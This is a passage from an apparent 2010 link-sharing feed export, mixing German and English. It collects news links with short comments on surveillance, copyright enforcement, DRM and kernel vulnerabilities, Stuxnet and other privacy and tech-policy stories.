IntegerOverflow, BufferOverflow und DoS angreifbar. Wozu braucht man nochmal DRM? +</p>http://www.techeye.net/security/microsofts-drm-helps-the-hackerpage_shots/2010/09/28/microsoftsdrmhelpsthehacker-oopstechey.pngmicrosoftsdrmhelpsthehacker-oopstechey11012010-09-28 19:10:377drm microsoftCanadian-Iranian blogger sentenced to 19 years in prison - The Globe and Mail19 Jahre für erst Anti-Iranregime und dann pro-Iranregime Blogger. You can't do it right.<p>19 Jahre für erst Anti-Iranregime und dann pro-Iranregime Blogger. You can't do it right. +</p>http://www.theglobeandmail.com/news/world/africa-mideast/canadian-iranian-blogger-sentenced-to-19-years-in-prison/article1729730/page_shots/2010/09/28/canadian-iranianbloggersentencedto19yearsin.pngcanadian-iranianbloggersentencedto19yearsin11012010-09-28 19:01:317iran prisionheise online - Segway-Eigentümer stirbt offenbar bei Segway-Unfallhttp://www.heise.de/newsticker/meldung/Segway-Eigentuemer-stirbt-offenbar-bei-Segway-Unfall-1096772.htmlpage_shots/2010/09/28/heiseonline-segway-eigentumerstirbtoffenbarb.pngheiseonline-segway-eigentumerstirbtoffenbarb41012010-09-28 17:59:237darwinaward death segway +Microsoft kooperiert mit Wordpress - "Eindrucksvoll" - N24.de +Da findet sich was zusammen gehört. s/Microsoft Live Blogging/Wordpress/g Immerhin hatte MS 30 Mio User.<p>Da findet sich was zusammen gehört. s/Microsoft Live Blogging/Wordpress/g Immerhin hatte MS 30 Mio User. +</p>http://www.n24.de/n/6351591page_shots/2010/09/28/microsoftkooperiertmitwordpress-eindrucksvo.pngmicrosoftkooperiertmitwordpress-eindrucksvo11012010-09-28 16:09:517microsoft wordpressOpenOffice.org community members launch the Document Foundation [LWN.net]s/OpenOffice/LibreOffice/g + +Oracle invited. So far backed by RedHat, Google, Novell and Cannonical. + +[Handelsblatt](http://www.handelsblatt.com/technologie/it-internet/openoffice-org-wird-unabhaengig-freie-programmierer-fluechten-vor-oracle;2662779)<p>s/OpenOffice/LibreOffice/g +</p> +<p>Oracle invited. So far backed by RedHat, Google, Novell and Cannonical. +</p> +<p><a href="http://www.handelsblatt.com/technologie/it-internet/openoffice-org-wird-unabhaengig-freie-programmierer-fluechten-vor-oracle;2662779">Handelsblatt</a> +</p>http://lwn.net/Articles/407383/page_shots/2010/09/28/openofficeorgcommunitymemberslaunchthedocume_.pngopenofficeorgcommunitymemberslaunchthedocume11012010-09-28 15:51:467openoffice oracleU.S. Tries to Make It Easier to Wiretap the Internet - NYTimes.comCryptowars II starten gerade.<p>Cryptowars II starten gerade. +</p>http://www.nytimes.com/2010/09/27/us/27wiretap.htmlpage_shots/2010/09/27/ustriestomakeiteasiertowiretaptheintern.pngustriestomakeiteasiertowiretaptheintern11012010-09-27 20:56:247cryptoHeatball :: HomeDa Glühlampen verboten sind gibt es jetzt den HeatBall (R). Hintergrund: In Energiesparlampen sind Quecksilber und andere Gifte, die wohl alle nun im Hausmüll enden. Der Einsatz von Energiesparlampen ist in vielen Fällen sinnvoll, aber nicht überall. Deshalb eine schöne Aktion, die für den Erhalt des Regenwaldes spendet.<p>Da Glühlampen verboten sind gibt es jetzt den HeatBall (R). Hintergrund: In Energiesparlampen sind Quecksilber und andere Gifte, die wohl alle nun im Hausmüll enden. Der Einsatz von Energiesparlampen ist in vielen Fällen sinnvoll, aber nicht überall. Deshalb eine schöne Aktion, die für den Erhalt des Regenwaldes spendet. +</p>http://heatball.de/page_shots/2010/09/27/heatballhome.pngheatballhome11012010-09-27 11:16:137heatballgulli.com - news - view - Vier Monate Gefängnis für Facebook-FreundschaftDie amerikanische Justiz schickte den Tierrechtsaktivisten Rod Coronado Anfang August für weitere vier Monate hinter Gitter. Er akzeptierte eine Freundschaftsanfrage auf der sozialen Plattform Facebook, was ein klarer Verstoß gegen seine Bewährungsauflagen sei. Diese verwehrten ihm unter anderem den Kontakt zu weiteren radikalen Aktivisten.<p>Die amerikanische Justiz schickte den Tierrechtsaktivisten Rod Coronado Anfang August für weitere vier Monate hinter Gitter. Er akzeptierte eine Freundschaftsanfrage auf der sozialen Plattform Facebook, was ein klarer Verstoß gegen seine Bewährungsauflagen sei. Diese verwehrten ihm unter anderem den Kontakt zu weiteren radikalen Aktivisten. +</p>http://www.gulli.com/news/vier-monate-gef-ngnis-f-r-facebook-freundschaft-2010-09-26page_shots/2010/09/26/gullicom-news-view-viermonategefangnisfu.pnggullicom-news-view-viermonategefangnisfu11012010-09-26 22:26:597facebookEvercookie: a tracking browser cookie you can't deleteSamy Kamkar, an open source developer whose motto is "think bad, do good" has released an API called "evercookie." Evercookie sets a nigh-undeletable tracking cookie in your browser, storing the information in eight separate ways; if you try to delete it but leave even one copy of the data around, it will repopulate itself using that last shred. Evercookies can even spread between browsers on the same system. The point of the project is to show that browsers are lagging behind privacy-invaders when it comes to cookie management, and to spur the organizations that publish browsers into creating better tools for privacy management.<p>Samy Kamkar, an open source developer whose motto is "think bad, do good" has released an API called "evercookie." Evercookie sets a nigh-undeletable tracking cookie in your browser, storing the information in eight separate ways; if you try to delete it but leave even one copy of the data around, it will repopulate itself using that last shred. Evercookies can even spread between browsers on the same system. The point of the project is to show that browsers are lagging behind privacy-invaders when it comes to cookie management, and to spur the organizations that publish browsers into creating better tools for privacy management. +</p>http://arstechnica.com/web/news/2010/09/evercookie-escalates-the-zombie-cookie-war-by-raising-awareness.arspage_shots/2010/09/26/evercookieatrackingbrowsercookieyoucantde.pngevercookieatrackingbrowsercookieyoucantde131012010-09-26 17:58:507browser cookie privacy privatssphäre surveillance trackingBrighton, England town council says that councillor is violating copyright law by youtubing the council meetingsJason Kitcat, a town councillor in Brighton, England, faces suspension from the council for posting clips of town meetings to YouTube. The council says that his attempt to "hold the administration politically to account" by trying "to highlight what the he believed were the administration's deficiencies" constitutes a political use of the council's "intellectual property." This is prohibited.<p>Jason Kitcat, a town councillor in Brighton, England, faces suspension from the council for posting clips of town meetings to YouTube. The council says that his attempt to "hold the administration politically to account" by trying "to highlight what the he believed were the administration's deficiencies" constitutes a political use of the council's "intellectual property." This is prohibited. +</p>http://jim.killock.org.uk/blog/brighton-tries-to-use-copyright-to-censor-councillor.htmlpage_shots/2010/09/26/brightonenglandtowncouncilsaysthatcouncillo.pngbrightonenglandtowncouncilsaysthatcouncillo131012010-09-26 17:57:007free speech, imaginary property, politics, zensurMultinational copyright companies will require French ISPs turn over 150,000 subscriber names and addresses per dayFrance's "3-strikes" rule comes into effect this week, and multinational corporations are already flooding French ISPs with more than 10,000 requests a day for the personal information of accused infringers; they estimate that this number will go up to 150,000 users/day shortly. Once a user has received three unsubstantiated accusations of infringement, the entire household is cut off from the Internet for a year, and it becomes a crime for any other ISP to connect that family or household. The only opportunity to defend yourself from the charge is a brief "traffic-court"-like streamlined judiciary. + +ISPs that are not able to turn over 150,000 personal identities per day face a fine of €1,500 per accused infringer.<p>France's "3-strikes" rule comes into effect this week, and multinational corporations are already flooding French ISPs with more than 10,000 requests a day for the personal information of accused infringers; they estimate that this number will go up to 150,000 users/day shortly. Once a user has received three unsubstantiated accusations of infringement, the entire household is cut off from the Internet for a year, and it becomes a crime for any other ISP to connect that family or household. The only opportunity to defend yourself from the charge is a brief "traffic-court"-like streamlined judiciary. +</p> +<p>ISPs that are not able to turn over 150,000 personal identities per day face a fine of €1,500 per accused infringer. +</p>http://torrentfreak.com/france-starts-reporting-millions-of-file-sharers-100921/page_shots/2010/09/26/no_page_shot.pngmultinationalcopyrightcompanieswillrequirefre131012010-09-26 17:54:5573strikes, copyfight, digital media, frankreich, imaginary property, isp, mp3, piracy, surveillanceMicrosoft's DRM makes your computer vulnerable to attackThe msnetobj.dll library is an ActiveX control used by Microsoft's DRM; it is intended to prevent the owner of a computer from saving or viewing certain files except under limited circumstances, and to prevent the computer's owner from disabling it or interfering with it. + +As if that wasn't bad enough, it is also vulnerable to three separate attacks -- buffer overflow, integer overflow and denial of service -- any of which can compromise your computer's working, leaving your data vulnerable to crooks and vandals.<p>The msnetobj.dll library is an ActiveX control used by Microsoft's DRM; it is intended to prevent the owner of a computer from saving or viewing certain files except under limited circumstances, and to prevent the computer's owner from disabling it or interfering with it. +</p> +<p>As if that wasn't bad enough, it is also vulnerable to three separate attacks -- buffer overflow, integer overflow and denial of service -- any of which can compromise your computer's working, leaving your data vulnerable to crooks and vandals. +</p>http://www.exploit-db.com/exploits/15061/page_shots/2010/09/26/microsoftsdrmmakesyourcomputervulnerableto.pngmicrosoftsdrmmakesyourcomputervulnerableto131012010-09-26 17:52:587drm exploit microsoftAndreas Pfitzmann ist tothttp://blog.kooptech.de/2010/09/zum-tod-von-andreas-pfitzmann/page_shots/2010/09/24/andreaspfitzmannisttot.pngandreaspfitzmannisttot171012010-09-24 19:50:177 Thomas de Maiziere macht den Schäuble 2.0 : netzpolitik.orgSchäublette 2.0<p>Schäublette 2.0 +</p>http://www.netzpolitik.org/2010/thomas-de-maiziere-macht-den-schauble-2-0/page_shots/2010/09/25/thomasdemaizieremachtdenschauble20netz001.pngthomasdemaizieremachtdenschauble20netz00111012010-09-24 17:37:427schaeubletteWettbewerb &#171; #zensus11 – Stoppt die Vollerfassung!Logo Wettbewerb zum AK Zensus Logo und Volkszählungsaufkleber<p>Logo Wettbewerb zum AK Zensus Logo und Volkszählungsaufkleber +</p>http://zensus11.de/wettbewerb/page_shots/2010/09/24/wettbewerb171zensus11stopptdievollerfas.pngwettbewerb171zensus11stopptdievollerfas11012010-09-24 17:35:337zensus Thomas de Maiziere macht den Schäuble 2.0 : netzpolitik.orgUnser Bundesinnenminister Thomas de Maiziere spielt jetzt Schäuble 2.0 und fordert einen weiteren Abbau unserer Grundrechte. Zu seinen Forderungen zählen die Erlaubnis zur „Quellen-Telekommunikationsüberwachung“ (Quellen-TKÜ) für den Verfassungsschutz und Strafverfolgungsbehörden, alle Geheimdienste sollen Kontostammdaten abfragen dürfen, in die Strafprozessordnung soll eine Verwertungsbefugnis für alle mittels Online-Durchsuchung gewonnen Daten kommen. Damit wäre die Online-Durchsuchung als reguläres Beweismittel im Strafprozess zugelassen. Außerdem sollen bestehende Regelungen, die zeitlich befristet waren, weiter fortgesetzt werden,<p>Unser Bundesinnenminister Thomas de Maiziere spielt jetzt Schäuble 2.0 und fordert einen weiteren Abbau unserer Grundrechte. Zu seinen Forderungen zählen die Erlaubnis zur „Quellen-Telekommunikationsüberwachung“ (Quellen-TKÜ) für den Verfassungsschutz und Strafverfolgungsbehörden, alle Geheimdienste sollen Kontostammdaten abfragen dürfen, in die Strafprozessordnung soll eine Verwertungsbefugnis für alle mittels Online-Durchsuchung gewonnen Daten kommen. Damit wäre die Online-Durchsuchung als reguläres Beweismittel im Strafprozess zugelassen. Außerdem sollen bestehende Regelungen, die zeitlich befristet waren, weiter fortgesetzt werden, +</p>http://www.netzpolitik.org/2010/thomas-de-maiziere-macht-den-schauble-2-0/page_shots/2010/09/24/thomasdemaizieremachtdenschauble20netz.pngthomasdemaizieremachtdenschauble20netz11012010-09-24 15:49:567thomas de maiziereGoogle Instant BlacklistDie Google Instant Blacklist. + +Like everything these days, great care must be taken to ensure that as few people as possible are offended by anything. Google Instant is no exception. Somewhere within Google there exists a master list of "bad words" and evil concepts that Google Instant is programmed to not act upon, lest someone see something offensive in the instant results... even if that's exactly what they typed into the search bar. We call it Google Blacklist. + +Give it a try. Go to the Google home page. Type in "puppy" and see the many results that fill your screen. Now type "bitch" and admire the blank screen. In this case, the two words could mean the exact same thing. But Google Instant is erring on the side of caution, protecting the searcher from seeing something they may not want to see.<p>Die Google Instant Blacklist. +</p> +<p>Like everything these days, great care must be taken to ensure that as few people as possible are offended by anything. Google Instant is no exception. Somewhere within Google there exists a master list of "bad words" and evil concepts that Google Instant is programmed to not act upon, lest someone see something offensive in the instant results... even if that's exactly what they typed into the search bar. We call it Google Blacklist. +</p> +<p>Give it a try. Go to the Google home page. Type in "puppy" and see the many results that fill your screen. Now type "bitch" and admire the blank screen. In this case, the two words could mean the exact same thing. But Google Instant is erring on the side of caution, protecting the searcher from seeing something they may not want to see. +</p>http://www.2600.com/googleblacklist/page_shots/2010/09/23/unknowntitle002_.pngunknowntitle00211012010-09-23 22:22:437blacklist googleSoll die Lörracher Tatwaffe verkauft werden?Das Foto der Tatwaffe, mit der eine 41jährige Anwältin in Lörrach am Sonntag um sich schoss, ging rasch um die Welt. Stolz hatte die Polizei das Bild der Walther GSP in die Kameras gehalten, einschließlich zweier Ersatzmagazine. Alles nur geklaut? + +Die angebliche Tatwaffe war keine, das Foto aus dem Internet "geliehen" (bei Klick aufs Bild: Ausschnitt aus einer Online-Meldung der WELT, zu Bild 3 klicken) +Das bemerkenswert detaillierte Bild zeigt neben der Pistole und den Magazinen auch einen Trockentrainingsabzug für die Disziplin Olympische Schnellfeuerpistole (OSP) - schon das hatte verwundert, denn für eine Frau, die die Disziplin Sportpistole früher mal geschossen hat, wäre dieser zweite Abzug sinnlos gewesen, da OSP eine reine Männerdisziplin ist. +Aber es war auch gar nicht der Abzug der Täterin - das Foto hat sich die Lörracher Polizei kurzerhand aus dem Internet besorgt: Der Augsburger Waffenhändler Schweigert bietet nämlich genau diese Kleinkaliberpistole zum Verkauf an, so steht es schon länger auf der Gebrauchtwaffen-Website des Verbands Deutscher Büchsenmacher und Waffenfachhändler. 290 Euro soll das "mit leichten Gebrauchsspuren" versehene Stück mit dem gezeigten Zubehör kosten - diese Spuren stammen allerdings sicher nicht von der Mordtat. User des Internetforums Waffen-Online hatten die Doppelung des Fotos gestern entdeckt. Der im Bild angebrachte Copyright-Hinweis "Waffen Schweigert" wurde für die Pressevorführung nicht einmal entfernt, wie das große Foto belegt - Hauptsache, man kann etwas vorweisen: "Dort schoss sie dann mit dieser Waffe um sich."<p>Das Foto der Tatwaffe, mit der eine 41jährige Anwältin in Lörrach am Sonntag um sich schoss, ging rasch um die Welt. Stolz hatte die Polizei das Bild der Walther GSP in die Kameras gehalten, einschließlich zweier Ersatzmagazine. Alles nur geklaut? +</p> +<p>Die angebliche Tatwaffe war keine, das Foto aus dem Internet "geliehen" (bei Klick aufs Bild: Ausschnitt aus einer Online-Meldung der WELT, zu Bild 3 klicken) + Das bemerkenswert detaillierte Bild zeigt neben der Pistole und den Magazinen auch einen Trockentrainingsabzug für die Disziplin Olympische Schnellfeuerpistole (OSP) - schon das hatte verwundert, denn für eine Frau, die die Disziplin Sportpistole früher mal geschossen hat, wäre dieser zweite Abzug sinnlos gewesen, da OSP eine reine Männerdisziplin ist. + Aber es war auch gar nicht der Abzug der Täterin - das Foto hat sich die Lörracher Polizei kurzerhand aus dem Internet besorgt: Der Augsburger Waffenhändler Schweigert bietet nämlich genau diese Kleinkaliberpistole zum Verkauf an, so steht es schon länger auf der Gebrauchtwaffen-Website des Verbands Deutscher Büchsenmacher und Waffenfachhändler. 290 Euro soll das "mit leichten Gebrauchsspuren" versehene Stück mit dem gezeigten Zubehör kosten - diese Spuren stammen allerdings sicher nicht von der Mordtat. User des Internetforums Waffen-Online hatten die Doppelung des Fotos gestern entdeckt. Der im Bild angebrachte Copyright-Hinweis "Waffen Schweigert" wurde für die Pressevorführung nicht einmal entfernt, wie das große Foto belegt - Hauptsache, man kann etwas vorweisen: "Dort schoss sie dann mit dieser Waffe um sich." +</p>http://www.visier.de/page_shots/2010/09/23/solldielorrachertatwaffeverkauftwerden.pngsolldielorrachertatwaffeverkauftwerden11012010-09-23 20:08:097photoshop Beginn der ACTA-Verhandlungsrunde in Tokyo : netzpolitik.orgvon Kirsten um 15:21 am Donnerstag, 23. September 2010 | 1 Kommentar +Heute fängt die 11. Verhandlungsrunde über das Antipiraterie-Abkommen ACTA (Anti-Counterfeiting Trade Agreement) in Tokyo an. Das Abkommen soll den Schutz von Urheberrechten im Internet verbessern und Produktfälschungen, gefälschte Medikamente und Datenklau bekämpfen. Die bisher geheim gehaltenen Verhandlungen finden nicht unter der Aufsicht der Welthandelsorganisation (WTO) oder der World Intellectual Property Organization (WIPO) statt. Zu den 39 verhandelnden Staaten gehören neben Europa die USA, Australien, Marokko, Kanada, Japan, Korea, Mexiko, Neuseeland, Singapur und die Schweiz. Durch die vielkritisierte Geheimhaltung und Intransparenz kamen Verhandlungstexte bisher immer nur unvorhergesehen an die Öffentlichkeit. Wie ZeroPaid gestern berichtete, hat wohl noch keine demokratische Institution Großbritanniens den Text zu Gesicht bekommen.<p>von Kirsten um 15:21 am Donnerstag, 23. September 2010 | 1 Kommentar + Heute fängt die 11. Verhandlungsrunde über das Antipiraterie-Abkommen ACTA (Anti-Counterfeiting Trade Agreement) in Tokyo an. Das Abkommen soll den Schutz von Urheberrechten im Internet verbessern und Produktfälschungen, gefälschte Medikamente und Datenklau bekämpfen. Die bisher geheim gehaltenen Verhandlungen finden nicht unter der Aufsicht der Welthandelsorganisation (WTO) oder der World Intellectual Property Organization (WIPO) statt. Zu den 39 verhandelnden Staaten gehören neben Europa die USA, Australien, Marokko, Kanada, Japan, Korea, Mexiko, Neuseeland, Singapur und die Schweiz. Durch die vielkritisierte Geheimhaltung und Intransparenz kamen Verhandlungstexte bisher immer nur unvorhergesehen an die Öffentlichkeit. Wie ZeroPaid gestern berichtete, hat wohl noch keine demokratische Institution Großbritanniens den Text zu Gesicht bekommen. +</p>http://www.netzpolitik.org/2010/beginn-der-acta-verhandlungsrunde-in-tokyo/page_shots/2010/09/23/beginnderacta-verhandlungsrundeintokyonet.pngbeginnderacta-verhandlungsrundeintokyonet11012010-09-23 15:53:307actaPatent Office Agrees With EFF’s Arguments on C2 VoIP Patent | Electronic Frontier FoundationDas VoIP-Patent ist gekippt :-) Dank an die EFF.<p>Das VoIP-Patent ist gekippt :-) Dank an die EFF. +</p>https://www.eff.org/deeplinks/2010/09/patent-office-agrees-eff-s-arguments-c2-voippage_shots/2010/09/23/patentofficeagreeswitheffsargumentsonc2vo.pngpatentofficeagreeswitheffsargumentsonc2vo11012010-09-23 10:25:447eff patentTrojaner &#132;stuxnet&#147;: Der digitale Erstschlag ist erfolgt - Digitales Denken - Feuilleton - FAZ.NETFor the records: Frank hat schon Recht mit "Der digitale Erstschlag ist erfolgt"<p>For the records: Frank hat schon Recht mit "Der digitale Erstschlag ist erfolgt" +</p>http://www.faz.net/s/RubCEB3712D41B64C3094E31BDC1446D18E/Doc~E8A0D43832567452FBDEE07AF579E893C~ATpl~Ecommon~Scontent.htmlpage_shots/2010/09/22/trojaner132stuxnet147derdigitaleerstsch.pngtrojaner132stuxnet147derdigitaleerstsch11012010-09-22 19:37:447stuxnet4chan invades Tea Party website • The RegisterDon't mess w/ 4chan. Funny defacement of teaparty.org + +The Oregon Tea Party made the mistake of using the "We Are Legion" slogan of Anonymous, the anti-Scientology movement that spawned in 4chan, in its official materials this summer. In response, Anonymous hacked the Tea Party's Facebook page, posting flames and image macros, before the local branch of the dissident conservative movement promised to stop using the slogan. <p>Don't mess w/ 4chan. Funny defacement of teaparty.org +</p> +<p>The Oregon Tea Party made the mistake of using the "We Are Legion" slogan of Anonymous, the anti-Scientology movement that spawned in 4chan, in its official materials this summer. In response, Anonymous hacked the Tea Party's Facebook page, posting flames and image macros, before the local branch of the dissident conservative movement promised to stop using the slogan. +</p>http://www.theregister.co.uk/2010/09/22/4chan_spikes_tea_party/page_shots/2010/09/22/4chaninvadesteapartywebsitetheregister.png4chaninvadesteapartywebsitetheregister11012010-09-22 19:04:2274chan teapartyMicrosoft sounds alert on massive Web bugTotalschaden.asp MS muss alles was bei denen Web macht patchen. Risk of MitM attack: + +Microsoft on Friday warned users that a critical bug in ASP.Net could be exploited by attackers to hijack encrypted Web sessions and pilfer usernames and passwords from Web sites.<p>Totalschaden.asp MS muss alles was bei denen Web macht patchen. Risk of MitM attack: +</p> +<p>Microsoft on Friday warned users that a critical bug in ASP.Net could be exploited by attackers to hijack encrypted Web sessions and pilfer usernames and passwords from Web sites. +</p>http://www.computerworld.com/s/article/9186842/Microsoft_sounds_alert_on_massive_Web_bugpage_shots/2010/09/21/unknowntitle001_.pngunknowntitle00111012010-09-21 22:31:547asp microsoftIntel Testing $50 Processor Upgrades at Point of Purchase | We Got ServedIntel CPU upgrade vom Rubbellos. Featureupgrades nach extra-Kohle.<p>Intel CPU upgrade vom Rubbellos. Featureupgrades nach extra-Kohle. +</p>http://www.wegotserved.com/2010/09/20/intel-testing-50-processor-upgrades-point-purchase/page_shots/2010/09/20/inteltesting50processorupgradesatpointofp.pnginteltesting50processorupgradesatpointofp11012010-09-20 20:35:177intelDas Web wird schneller mit <script defer>http://webkit.org/blog/1395/running-scripts-in-webkit/page_shots/2010/09/19/daswebwirdschnellermitscriptdefer.pngdaswebwirdschnellermitscriptdefer141012010-09-19 21:10:307html javascript web webkitDawkins empfiehlt ThePirateBayWeil er mit seiner Dokumentation über Bibelschulen die ganze Welt erreichen will. Er ist ein bekannter “Evolutionist” und hat auch das Wort “Meme” geprägt.<p>Weil er mit seiner Dokumentation über Bibelschulen die ganze Welt erreichen will. Er ist ein bekannter “Evolutionist” und hat auch das Wort “Meme” geprägt. +</p>http://torrentfreak.com/prof-richard-dawkins-advocates-the-use-of-bittorrent-100919/page_shots/2010/09/19/dawkinsempfiehltthepiratebay.pngdawkinsempfiehltthepiratebay141012010-09-19 20:58:307bittorrent dawkins evolution4chan Users Crash MPAA Website in Pro-Piracy ProtestDoS 4 DoS by 4chan + +The 4chan user group “Anonymous” executed attacks this morning that crashed the websites run by the Motion Picture Association of America (MPAA) and Indian tech firm Aiplex Software. The attacks were made in response to anti-piracy measures taken by both organizations.<p>DoS 4 DoS by 4chan +</p> +<p>The 4chan user group “Anonymous” executed attacks this morning that crashed the websites run by the Motion Picture Association of America (MPAA) and Indian tech firm Aiplex Software. The attacks were made in response to anti-piracy measures taken by both organizations. +</p>http://mashable.com/2010/09/18/4chan-mpaa-ddos-attack/page_shots/2010/09/19/4chanuserscrashmpaawebsiteinpro-piracyprote.png4chanuserscrashmpaawebsiteinpro-piracyprote11012010-09-19 00:10:5774chan mpaaheise online - Lücke im Linux-Kernel ermöglicht Root-RechteMal wieder der Umgang mit Sicherheitslücken im LK. local root exploit regression<p>Mal wieder der Umgang mit Sicherheitslücken im LK. local root exploit regression +</p>http://www.heise.de/newsticker/meldung/Luecke-im-Linux-Kernel-ermoeglicht-Root-Rechte-1081195.htmlpage_shots/2010/09/18/heiseonline-luckeimlinux-kernelermoglichtro.pngheiseonline-luckeimlinux-kernelermoglichtro11012010-09-18 18:59:027exploit linux securityThe 6502 Microprocessor Turns 35 &laquo; adafruit industries blogThe 6502 microprocessor is 35 years old as of September 16th. Introduced in 1975 at WesCon in San Francisco, the chip cost $25. Many early, hugely-popular home computers and gaming consoles sported it, including: Apple 1 & ][; Commodore PET & Vic 20; Atari 2600, 400 & 800.<p>The 6502 microprocessor is 35 years old as of September 16th. Introduced in 1975 at WesCon in San Francisco, the chip cost $25. Many early, hugely-popular home computers and gaming consoles sported it, including: Apple 1 &amp; ][; Commodore PET &amp; Vic 20; Atari 2600, 400 &amp; 800. +</p>http://www.adafruit.com/blog/2010/09/17/the-6502-microprocessor-turns-35/page_shots/2010/09/17/the6502microprocessorturns35laquoadafruit.pngthe6502microprocessorturns35laquoadafruit11012010-09-17 23:07:1776502 motorolaPrivacy tool for Iranians withdrawn amid security concerns • The RegisterHaystack sollte die Identität von Internetusern verstecken. +The move came after hacker Jacob Appelbaum called Haystack “the worst piece of software I have ever had the displeasure of ripping apart” <p>Haystack sollte die Identität von Internetusern verstecken. + The move came after hacker Jacob Appelbaum called Haystack “the worst piece of software I have ever had the displeasure of ripping apart” +</p>http://www.theregister.co.uk/2010/09/14/haystack_privacy_debacle/page_shots/2010/09/17/privacytoolforiranianswithdrawnamidsecurity.pngprivacytoolforiranianswithdrawnamidsecurity11012010-09-17 22:54:157haystack privacyIs Stuxnet the 'best' malware ever?Etwas den Stuxnet-Trojaner würdigen. Offensichtlich qualitativ über dem Durchschnitt. +[Fefe](http://blog.fefe.de/?ts=b26cf68e) hat da einiges zu aufgeschrieben.<p>Etwas den Stuxnet-Trojaner würdigen. Offensichtlich qualitativ über dem Durchschnitt. + <a href="http://blog.fefe.de/?ts=b26cf68e">Fefe</a> hat da einiges zu aufgeschrieben. +</p>http://www.computerworld.com/s/article/9185919/Is_Stuxnet_the_best_malware_ever_page_shots/2010/09/17/stuxnet-malware.pngstuxnet-malware11012010-09-17 22:51:037malware stuxnet trojanSlashdot Hardware Story | HDCP Master Key Is Legitimate; Blu-ray Is CrackedTja, da will wohl jemand den BlueRay Absatz ankurbeln...<p>Tja, da will wohl jemand den BlueRay Absatz ankurbeln... +</p>http://hardware.slashdot.org/story/10/09/17/0247246/HDCP-Master-Key-Is-Legitimate-Blu-ray-Is-Crackedpage_shots/2010/09/17/slashdothardwarestoryhdcpmasterkeyislegit.pngslashdothardwarestoryhdcpmasterkeyislegit11012010-09-17 17:25:437bluerayGoogle engineer accesses teen emails: What&#039;s the damage for Google? | ZDNet Google Admin liest Mails mit und belästigt Teenies damit.<p>Google Admin liest Mails mit und belästigt Teenies damit. +</p>http://www.zdnet.com/blog/google/google-engineer-accesses-teen-emails-whats-the-damage-for-google/2462page_shots/2010/09/17/googleengineeraccessesteenemailswhat039s.pnggoogleengineeraccessesteenemailswhat039s11012010-09-17 00:58:447e-mail google spyDamning Zuckerberg IMs confirmedA series of "embarrassing and damaging" IMs from Mark Zuckerberg have been confirmed as real by The New Yorker, and by the Facebook founder himself. Among them, an exchange once leaked to Silicon Alley Insider in which Zuckerberg explains to a friend that his control of Facebook affords him access to any personal information he might care to access on any Harvard student: +"ZUCK: yea so if you ever need info about anyone at harvard +ZUCK: just ask +ZUCK: i have over 4000 emails, pictures, addresses, sns +FRIEND: what!? how'd you manage that one? +ZUCK: people just submitted it +ZUCK: i don't know why +ZUCK: they "trust me" +ZUCK: dumb fucks +... +FRIEND: so have you decided what you are going to do about the websites? +ZUCK: yea i'm going to fuck them +ZUCK: probably in the year +ZUCK: *ear"<p>A series of "embarrassing and damaging" IMs from Mark Zuckerberg have been confirmed as real by The New Yorker, and by the Facebook founder himself. Among them, an exchange once leaked to Silicon Alley Insider in which Zuckerberg explains to a friend that his control of Facebook affords him access to any personal information he might care to access on any Harvard student: + "ZUCK: yea so if you ever need info about anyone at harvard + ZUCK: just ask + ZUCK: i have over 4000 emails, pictures, addresses, sns + FRIEND: what!? how'd you manage that one? + ZUCK: people just submitted it + ZUCK: i don't know why + ZUCK: they "trust me" + ZUCK: dumb fucks + ... + FRIEND: so have you decided what you are going to do about the websites? + ZUCK: yea i'm going to fuck them + ZUCK: probably in the year + ZUCK: *ear" +</p>http://www.newyorker.com/reporting/2010/09/20/100920fa_fact_vargas?currentPage=allpage_shots/2010/09/15/damningzuckerbergimsconfirmed.pngdamningzuckerbergimsconfirmed131012010-09-15 14:19:337bürgerrechte facebook privacy privatssphäreIs Steve Jobs a Ninja?A Japanese magazine, SPA!, claims that Steve Jobs was stopped by airport security last year, even though he was boarding his own plane. According to the report, they objected to a set of ninja stars. From Bloomberg: +"Jobs said it wouldn't make sense for a person to try to hijack his own plane, according to the report. He then told officials he would never visit Japan again, the magazine reported. Apple declined to comment."<p>A Japanese magazine, SPA!, claims that Steve Jobs was stopped by airport security last year, even though he was boarding his own plane. According to the report, they objected to a set of ninja stars. From Bloomberg: + "Jobs said it wouldn't make sense for a person to try to hijack his own plane, according to the report. He then told officials he would never visit Japan again, the magazine reported. Apple declined to comment." +</p>http://www.bloomberg.com/news/2010-09-14/steve-jobs-stopped-at-japan-airport-over-ninja-stars-spa-says.htmlpage_shots/2010/09/15/isstevejobsaninja_.pngisstevejobsaninja131012010-09-15 14:17:177airport apple security theaterUK government hands £500M copyright enforcement and censorship tab to nation's Internet usersOne question that wasn't answered by the Act (that would have come out in the debate, if it had happened), is who will pay for this -- the copyright industries, who are the beneficiaries of reduced infringement, or the ISPs, who would then bear the additional costs and have to pass them on to their customers, including the ones who aren't breaching copyright? + +Now the UK government has answered the question: the ISP industry and its customers will subsidize multinational record labels and movie companies to the tune of 25 percent of the cost of sending out the letters. The Open Rights Group estimates that this will come out to £500 million in extra costs that all ISP customers will bear.<p>One question that wasn't answered by the Act (that would have come out in the debate, if it had happened), is who will pay for this -- the copyright industries, who are the beneficiaries of reduced infringement, or the ISPs, who would then bear the additional costs and have to pass them on to their customers, including the ones who aren't breaching copyright? +</p> +<p>Now the UK government has answered the question: the ISP industry and its customers will subsidize multinational record labels and movie companies to the tune of 25 percent of the cost of sending out the letters. The Open Rights Group estimates that this will come out to £500 million in extra costs that all ISP customers will bear. +</p>http://arstechnica.com/tech-policy/news/2010/09/should-isps-pay-for-p2p-warning-letters-uk-says-yes.ars?utm_source=rss&utm_medium=rss&utm_campaign=rss#page_shots/2010/09/15/ukgovernmenthands500mcopyrightenforcementan.pngukgovernmenthands500mcopyrightenforcementan131012010-09-15 14:15:2473strikes, contentmafia, copyfight, imaginary property, isp, music, piracy, uk, überwachungPA Homeland Security gave names of anti-drill activists to drilling companyPennsylvania Homeland Security has been spying on anti-drilling activists, taking down names of attendees at meetings and even a screening of a documentary on drilling; these dossiers on peaceful protesters are then supplied to Marcellus Shale, a drilling company. The State Homeland Security Director James Powers justifies the snooping on meetings and information sessions because activists' "presence may spark something else. [I don't want to see public meetings] escalate to physical criminal acts."<p>Pennsylvania Homeland Security has been spying on anti-drilling activists, taking down names of attendees at meetings and even a screening of a documentary on drilling; these dossiers on peaceful protesters are then supplied to Marcellus Shale, a drilling company. The State Homeland Security Director James Powers justifies the snooping on meetings and information sessions because activists' "presence may spark something else. [I don't want to see public meetings] escalate to physical criminal acts." 